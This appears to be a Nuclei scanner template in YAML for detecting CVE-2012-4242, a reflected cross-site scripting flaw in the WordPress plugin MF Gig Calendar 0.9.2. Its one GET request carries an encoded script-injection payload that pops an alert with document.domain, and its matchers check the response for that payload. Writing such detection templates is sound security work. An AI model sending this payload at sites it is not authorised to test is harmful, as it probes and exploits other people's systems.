49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2012-4242
|
|
|
|
info:
|
|
name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-4242
|
|
- http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2012-4242
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00216
|
|
epss-percentile: 0.59299
|
|
cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: mf_gig_calendar_project
|
|
product: mf_gig_calendar
|
|
tags: cve,cve2012,wordpress,xss,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100cef3dfe357096d0aa6642b6abd5778ea3ca38fa6c50baaeaa181d49c2593058102200df2f81099e546b20799dc8db99a07f0ce427f7b86a3f3c83a4f46d258e233c6:922c64590222798bb761d5b6d8e72950
|